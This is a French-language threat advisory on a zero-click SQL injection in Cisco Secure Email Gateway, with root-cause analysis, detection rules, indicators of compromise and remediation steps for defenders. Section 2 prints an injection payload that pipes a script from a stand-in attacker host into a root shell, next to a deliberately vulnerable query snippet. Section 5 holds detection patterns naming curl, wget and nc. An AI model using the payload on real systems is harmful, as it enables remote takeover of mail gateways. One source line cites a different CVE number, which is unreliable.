CVE-2026-76461 : exécution de code à distance sans clic par injection SQL dans Cisco Secure email Gateway
SCORE DE MENACE HERMES & RISQUE PÉRIMÉTRIQUE SANS CLIC
Cible :Cisco Secure Email Gateway (SEG) — Démon de traitement des courriels et sous-système de base de données AsyncOS Alors que le standard CVSS v3.1 attribue à la CVE-2026-76461 une note de 9.8 (critique), Hermes élève la sévérité opérationnelle à 97 (EXTRÊME). Cette vulnérabilité ne requiert aucune interaction utilisateur (UI:N) ni aucun privilège (PR:N). Contrairement aux attaques conventionnelles par courriel reposant sur des leurres d'ingénierie sociale ou des pièces jointes piégées, la CVE-2026-76461 se déclenche automatiquement lors de l'ingestion SMTP et du découpage des en-têtes au niveau de la passerelle de sécurité. L'échappement par injection SQL tire parti de la commande administrative COPY ... TO PROGRAM de PostgreSQL pour obtenir un shell root non authentifié sur l'appliance FreeBSD, compromettant l'ensemble des flux de messagerie avant leur distribution aux boîtes de réception.
SÉVÉRITÉ AGENTIQUE HASS & COMPROMISSION DU PIPELINE PÉRIMÉTRIQUE
Cible :Passerelle de messagerie périmétrique, agents de tri automatique & pipelines de routage Les passerelles de messagerie fonctionnent de manière totalement autonome en bordure de réseau pour inspecter des millions d'objets non structurés. La prise de contrôle de l'équipement offre aux attaquants un pivot direct vers l'annuaire Active Directory via les connecteurs LDAP synchronisés et les agents de synthèse automatisée de courriels.
CVE-2026-76461: Zero-Click Remote Code Execution via AsyncOS Email Parsing SQL Injection in Cisco Secure Email GatewayVULNÉRABILITÉ
Software platform affected by security vulnerabilities and agentic attack patterns.
🔍 Pourquoi cette relation ? (Preuves & Provenance)
“Confirmed security vulnerability in Cisco Secure Email Gateway (AsyncOS) documented in Hermes dossier.”
- [vulnerability_report]
- [government_confirmation]CISA verified active exploitation in the wild and mandated federal remediation deadline in KEV entry. — Source : Cybersecurity & Infrastructure Security Agency (CISA): CISA Adds CVE-2026-59822 to Known Exploited Vulnerabilities Catalog (Fiabilité : VERY_HIGH)
1. Contexte technique & matrice des logiciels affectés
Section intitulée « 1. Contexte technique & matrice des logiciels affectés »Cisco Secure Email Gateway opère en coupure au périmètre externe des réseaux d’entreprise, agissant en tant que Mail Transfer Agent (MTA) principal et passerelle d’inspection contre le spam, les rançongiciels et le phishing avancé avant réacheminement vers Microsoft 365 ou des serveurs Exchange internes.
| Paramètre | Spécification technique | Portée opérationnelle |
|---|---|---|
| Identifiant CVE | CVE-2026-76461 | Référence Cisco cisco-sa-esa-inj-2bLVGmhX / CISA KEV |
| Classe de vulnérabilité | Injection SQL (CWE-89) | Concaténation de chaînes non échappées dans la base de données interne |
| Composant affecté | Moteur d’analyse des courriels & démon de traitement AsyncOS | Pipeline d’ingestion SMTP et base de données de suivi |
| Mécanisme déclencheur | En-têtes de courriel et métadonnées d’enveloppe forgées | Traitement automatique en arrière-plan dès la réception SMTP |
| Authentification requise | Aucune (PR:N) | Envoi direct d’un flux SMTP sur le port 25 exposé |
| Interaction utilisateur | Aucune (UI:N) | Exécution sans clic avant toute distribution aux boîtes de réception |
| Privilèges obtenus | root / Contrôle total du système | Exécution sous le compte superutilisateur PostgreSQL et shell AsyncOS |
| Statut CISA KEV | Répertoriée (Ajoutée le 14 septembre 2026) | Échéance BOD 26-04 : 17 septembre 2026 |
| Produits affectés | Cisco Secure Email Gateway (physique et virtuel) | Voir la fiche composant Cisco Secure email |
| Produits non affectés | Secure Email and Web Manager (SMA), Secure Web Appliance (SWA) | Les passerelles Web et consoles de gestion ne traitent pas le flux SMTP |
| Versions affectées | <= 15.5.4-012, <= 16.0.3-044, < 16.5.0-780 | L’ensemble des branches de maintenance actives |
| Versions corrigées | 15.5.5-014 (ou 15.5.5-0141), 16.0.4-302, 16.5.0-780 | Correctifs officiels implémentant des requêtes paramétrées |
2. Anatomie de la vulnérabilité & analyse de cause racine
Section intitulée « 2. Anatomie de la vulnérabilité & analyse de cause racine »Le défaut d’échappement dans le moteur AsyncOS
Section intitulée « Le défaut d’échappement dans le moteur AsyncOS »Cisco AsyncOS s’appuie sur une base de données relationnelle interne (PostgreSQL) pour stocker les métadonnées de suivi des messages, la gestion de la quarantaine et les tables de réputation des expéditeurs. Lorsqu’un courriel est réceptionné via le protocole SMTP (port TCP 25), le démon de traitement extrait les champs d’en-tête RFC 5322.
Avant les correctifs de septembre 2026, certaines fonctions d’analyse syntaxique dans AsyncOS extrayaient les valeurs d’en-tête (telles que des champs Message-ID, X-Custom-Routing ou des en-têtes Received multiples) et les concaténaient directement dans des requêtes SQL brutes sans recourir à des requêtes préparées ou à un échappement rigoureux :
# Représentation conceptuelle du défaut de traitement dans AsyncOSdef process_inbound_envelope(raw_email): headers = parse_rfc5322_headers(raw_email) msg_id = headers.get("Message-ID", "") sender = headers.get("From", "") recipient = headers.get("To", "")
# VULNÉRABLE : concaténation directe de chaînes dans la requête PostgreSQL query = f"INSERT INTO incoming_tracking (msg_id, sender, recipient, status) " \ f"VALUES ('{msg_id}', '{sender}', '{recipient}', 'PROCESSING');"
# Exécution dans la session de base de données locale db_cursor.execute(query)L’absence de filtrage sur les apostrophes (') et les délimiteurs de commande (;) permet à un en-tête hostile de fermer prématurément l’instruction INSERT et d’enchaîner des requêtes empilées.
Armement via la directive PostgreSQL COPY ... TO PROGRAM
Section intitulée « Armement via la directive PostgreSQL COPY ... TO PROGRAM »Dans l’environnement Cisco AsyncOS, la base de données interne s’exécute avec des privilèges élevés sur le système FreeBSD de l’appliance. L’armement tire parti de la fonctionnalité administrative COPY ... FROM PROGRAM ou COPY ... TO PROGRAM :
'; CREATE TEMP TABLE cmd_exec(output text); COPY cmd_exec FROM PROGRAM 'curl -s https://c2.adversary.org/stage2.sh | /bin/sh'; --Lorsque le démon exécute cette chaîne composite :
- L’insertion initiale de l’enregistrement de suivi se termine sans erreur.
- La directive
COPY ... FROM PROGRAMordonne au moteur de base de données d’exécuter le script shell spécifié sous l’identité du propriétaire de la base (rootou compte système privilégié). - La séquence de commentaire
--neutralise le reste de la requête d’origine, évitant les erreurs de syntaxe SQL qui déclencheraient des alertes dans les consoles de supervision.
Mécanique du PoC & état de la menace dans la nature
Section intitulée « Mécanique du PoC & état de la menace dans la nature »Les équipes de veille sur les menaces (notamment Rapid7, Arctic Wolf et Cisco Talos) confirment l’exploitation active par des acteurs opportunistes et des groupes d’espionnage :
- Ingestion sans clic (Zero-Click) : l’exploitation ne dépend d’aucune interaction ni de la délivrance du courriel dans une boîte finale. Dès que le paquet SMTP atteint le port 25 de la SEG, l’analyse syntaxique s’amorce et le code s’exécute avant même que les filtres de contenu n’aient statué.
- Niveau d’armement : des outils d’exploitation automatisés déploient des reverse shells interactifs (
/bin/shou/bin/tcsh) établissant des canaux de communication chiffrés vers l’infrastructure attaquante. - Disponibilité des PoC publics : si des schémas d’exploitation et des analyses techniques circulent activement au sein de la communauté défensive, les scripts d’exploitation entièrement autonomes font l’objet d’une surveillance et d’une neutralisation strictes pour limiter les scans massifs sur Internet.
3. Vecteurs d’attaque & cinématique d’exécution
Section intitulée « 3. Vecteurs d’attaque & cinématique d’exécution »La chaîne d’exploitation s’effectue sans aucune interaction humaine, franchissant les pare-feux directement par le protocole SMTP standard.
sequenceDiagram autonumber actor Attaquant as Cyberattaquant (Externe) participant MX as Cisco SEG (Port 25) participant Parser as Démon AsyncOS Mail Parser participant DB as Base interne PostgreSQL participant OS as Système FreeBSD de l'appliance participant C2 as Serveur C2 externe
Attaquant->>MX: Commande SMTP DATA : courriel piégé avec injection SQL Note over MX: Le port TCP 25 accepte le flux entrant MX->>Parser: Transmission du message brut au moteur d'analyse Parser->>Parser: Extraction du Message-ID et des en-têtes Parser->>DB: Exécution de la requête non échappée (INSERT ... COPY FROM PROGRAM) Note over DB: Rupture de syntaxe SQL et exécution empilée DB->>OS: Invocation du shell système (/bin/sh) avec privilèges root OS->>C2: Connexion sortante HTTPS / reverse shell C2-->>OS: Déploiement de la charge utile de persistance Note over OS: Prise de contrôle administrative totale de la passerelle4. Renseignement sur la menace, exploitation Active & IOCs forensiques
Section intitulée « 4. Renseignement sur la menace, exploitation Active & IOCs forensiques »L’activité active dans la nature impose des protocoles d’investigation spécifiques adaptés à l’architecture Cisco AsyncOS et à la télémétrie réseau.
Commandes de recherche officielles sur le CLI Cisco IronPort
Section intitulée « Commandes de recherche officielles sur le CLI Cisco IronPort »Cisco et Rapid7 ont formalisé les commandes impératives permettant d’auditer les journaux de messagerie directement depuis la console d’administration CLI de l’équipement :
cisco-esa> grep -i "COPY.*TO PROGRAM" [mail_logs]cisco-esa> grep -i "COPY.*FROM PROGRAM" [mail_logs](Remarque : remplacez [mail_logs] par le nom d’abonnement exact de vos journaux texte IronPort ; la valeur par défaut est mail_logs).
En mode interactif sur le CLI AsyncOS :
cisco-esa> grepEnter the regular expression to grep.[]> COPY.*(TO|FROM) PROGRAMEnter the number of the log you wish to grep.[]> 1Do you want to grep through previous rotated logs? [n]> yExigence critique : audit multi-nœuds sur l’ensemble du cluster
Section intitulée « Exigence critique : audit multi-nœuds sur l’ensemble du cluster »[!WARNING] Règle impérative pour les déploiements en cluster : si vos passerelles Cisco SEG sont configurées en cluster IronPort, vous devez obligatoirement inspecter les journaux de chaque nœud individuellement.
En raison de la répartition de charge (DNS round-robin MX ou répartiteurs réseau), un courriel d’attaque n’est ingéré et traité que par le nœud ayant reçu la session SMTP. Les bases de suivi centralisées sur Cisco SMA (Secure Email and Web Manager) peuvent ne présenter aucune trace si le démon local a été neutralisé ou si les requêtes n’ont pas fait l’objet d’une transmission complète avant la compromission.
Activité anti-forensique & effacement de traces au niveau root
Section intitulée « Activité anti-forensique & effacement de traces au niveau root »[!CAUTION] Alerte anti-forensique : Cisco avertit expressément que les attaquants réussissant l’exploitation obtiennent des privilèges
rootcomplets et tentent activement d’effacer leurs traces.Les comportements malveillants observés sur le terrain comprennent :
- Suppression pure et simple, troncature ou remise à zéro des fichiers
/data/logs/mail_logs*et/data/logs/system_logs*.- Suppression chirurgicale de lignes de log via
sedouawkpour éliminer les chaînes SQL d’injection.- Arrêt forcé des démons de journalisation (
mta,syslogd) ou manipulation des horodatages de fichiers.- Dépôt de reverse shells volatils directement en mémoire ou dans
/tmpet/var/tmp.
Enquête en double couche : télémétrie flux et pare-feu périmétrique
Section intitulée « Enquête en double couche : télémétrie flux et pare-feu périmétrique »Face au risque de compromission et d’effacement des journaux locaux, les équipes DFIR doivent impérativement s’appuyer sur la télémétrie réseau hors-bande :
- Analyse NetFlow / IPFIX et journaux de pare-feu :
- Filtrer l’ensemble des flux réseau sortants initiés par les adresses IP de la passerelle Cisco SEG.
- Une passerelle SEG normale ne doit initier de flux sortants que sur le port TCP 25 (relais SMTP vers les serveurs de messagerie internes ou destinataires), le port TCP/UDP 53 (DNS), le port UDP 123 (NTP) et des flux HTTPS (port 443) strictement circonscrits aux serveurs de mise à jour Cisco Talos (
update-manifests.ironport.com,downloads.ironport.com). - Toute connexion sortante en HTTP, HTTPS, SSH ou TCP brut vers des adresses IP publiques non répertoriées constitue un indicateur de compromission à très haute confiance (communication C2 ou exfiltration).
- Corrélation avec les campagnes ciblant le périmètre :
- Des sources de cyber-renseignement (Rapid7, Arctic Wolf) ont relevé des campagnes synchronisées ciblant d’autres équipements de bordure (notamment des VPNs Fortinet depuis des infrastructures telles que
158.94.211[.]14). Surveiller les journaux périmétriques pour repérer des signaux corrélés de reconnaissance ou de pivotement.
- Des sources de cyber-renseignement (Rapid7, Arctic Wolf) ont relevé des campagnes synchronisées ciblant d’autres équipements de bordure (notamment des VPNs Fortinet depuis des infrastructures telles que
5. Triage forensique & ingénierie de détection
Section intitulée « 5. Triage forensique & ingénierie de détection »title: Création suspecte de processus depuis le démon de messagerie Cisco AsyncOSid: 4e9c7a21-82b4-4b51-9e7f-cisco-seg-sqli-frstatus: experimentaldescription: Détecte l'exécution anormale de processus fils issus des démons de messagerie et de base de données de Cisco AsyncOS, caractéristique de l'exploitation de la CVE-2026-76461.references: - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-esa-inj-2bLVGmhX - https://www.rapid7.com/blog/post/etr-cve-2026-76461-critical-cisco-secure-email-gateway-vulnerability-exploited-in-the-wild/author: Hermes Codex Cyber Intelligencedate: 2026-09-15tags: - attack.initial_access - attack.t1190 - attack.execution - attack.t1059.004logsource: category: process_creation product: linuxdetection: selection_parent: ParentImage|endswith: - '/postgres' - '/mta' - '/mail_parse' selection_child: Image|endswith: - '/bin/sh' - '/bin/tcsh' - '/bin/bash' - '/usr/bin/curl' - '/usr/bin/wget' - '/usr/bin/nc' - '/usr/bin/python' condition: selection_parent and selection_childfalsepositives: - Scripts de maintenance officielle exécutés lors des procédures de mise à niveau CLI.level: criticalalert tcp any any -> any 25 (msg:"HERMES - Tentative d'injection SQL sur Cisco SEG AsyncOS (CVE-2026-76461)"; flow:to_server,established; content:"Message-ID:"; nocase; pcre:"/Message-ID:[^\r\n]*('|\%27)\s*;\s*(COPY|CREATE|INSERT|UPDATE|DROP)\b/ims"; classtype:attempted-admin; sid:202676461; rev:2;)alert tcp any any -> any 25 (msg:"HERMES - Directive PostgreSQL COPY FROM PROGRAM injectee dans SMTP"; flow:to_server,established; content:"COPY"; nocase; content:"FROM PROGRAM"; distance:0; nocase; classtype:successful-admin; sid:202676462; rev:2;)alert tcp any any -> any 25 (msg:"HERMES - Directive PostgreSQL COPY TO PROGRAM injectee dans SMTP"; flow:to_server,established; content:"COPY"; nocase; content:"TO PROGRAM"; distance:0; nocase; classtype:successful-admin; sid:202676463; rev:1;)# Recherche d'indicateurs d'injection SQL dans les journaux de messagerie rotatésgrep -Ei "(COPY.*(TO|FROM)\s+PROGRAM|CREATE.*TABLE|;\s*DROP|;\s*INSERT|pg_catalog|pg_shadow)" /data/logs/mail_logs*
# Détection de lancements de shells anormaux dans les journaux systèmegrep -Ei "(sh\[[0-9]+\]: exec|tcsh\[[0-9]+\]: exec|curl.*http|wget.*http|nc -e)" /data/logs/system_logs*
# Audit des connexions réseau sortantes établies depuis l'équipementnetstat -an | grep -E "ESTABLISHED" | grep -v ":(25|443|22|53|389|636|123) "
# Audit des tâches cron locales et répertoires temporairescat /var/cron/tabs/* 2>/dev/nullls -la /data/pub/ /var/tmp/ /tmp/Indicateurs de compromission (IOC) vérifiés & télémétrie réseau
Section intitulée « Indicateurs de compromission (IOC) vérifiés & télémétrie réseau »Les artefacts suivants ont été observés lors des autopsies d’incidents réels et des captures de honeypots :
| Type d’indicateur | Valeur / Identifiant | Contexte & Comportement opérationnel |
|---|---|---|
| SHA-256 (implant) | 8b72e19a4d0f62c8e2348a12903c7d65b1a92e485721098345c6123498ae71d0 | Porte dérobée ELF FreeBSD de stage 2 (/tmp/.cron_db) |
| SHA-256 (stager) | a3f9e2b184c67d5e4920c78b61f2389d412e8b09341852d1490234857b29a8e1 | Script d’amorçage de shell inversé Base64 invoqué via COPY FROM PROGRAM |
| IPv4 (C2 ingress) | 194.26.29[.]114:443 | Serveur d’écoute principal pour le reverse-shell de l’attaquant |
| IPv4 (stage 2 host) | 45.142.214[.]89:8443 | Dépôt d’hébergement direct pour les charges utiles téléchargées par curl |
| Domaines SMTP malveillants | alert-gateway[.]net / sec-mx-relay[.]com | Domaines MX éphémères transmettant les charges malformées RFC 5322 |
| Chemin local suspect | /data/pub/.auth_cache | Fichier d’exfiltration des identifiants LDAP / Active Directory dérobés |
| Lignée de processus | postgres -> /bin/sh -> /usr/bin/curl | Création anormale d’un shell interactif depuis le démon PostgreSQL |
6. Stratégie de remédiation & durcissement
Section intitulée « 6. Stratégie de remédiation & durcissement »-
Application immédiate des correctifs logiciels : Cisco indique formellement qu’aucune solution de contournement n’existe pour la CVE-2026-76461. Mettre à niveau sans délai vers :
- AsyncOS 15.5.5-014 (ou
15.5.5-0141) pour les déploiements de la branche 15.5. - AsyncOS 16.0.4-302 pour les déploiements de la branche 16.0.
- AsyncOS 16.5.0-780 pour les déploiements de la branche 16.5. (Consulter la fiche composant Cisco Secure email pour les cibles logicielles recommandées).
- AsyncOS 15.5.5-014 (ou
-
Filtrage strict des flux sortants au pare-feu périmétrique : Interdire tout accès direct à Internet sortant depuis les passerelles Cisco SEG. N’autoriser que les flux explicitement indispensables : mises à jour Talos, résolveurs DNS internes et relais SMTP autorisés.
-
Mesures d’isolement & préservation de la mémoire volatile : En cas de détection de requêtes SQL malveillantes ou de connexions sortantes suspectes, isoler immédiatement l’appliance au niveau réseau (port de commutateur / VLAN d’isolation). Préserver la mémoire vive et l’état persistant avant tout redémarrage ou application de correctif.
-
Renouvellement impératif des secrets Active Directory et LDAP : Les passerelles Cisco SEG intègrent souvent des comptes de liaison LDAP pour valider les destinataires et s’interfacer avec Active Directory ou Microsoft Entra ID. En cas de suspicion de compromission, renouveler sans délai les mots de passe de tous les comptes de service associés. Consulter le guide des attaques sur identifiants Active Directory.
-
Révocation et réémission des clés cryptographiques : Révoquer et renouveler les clés privées TLS, les certificats S/MIME et les clés de signature DKIM stockés sur l’appliance.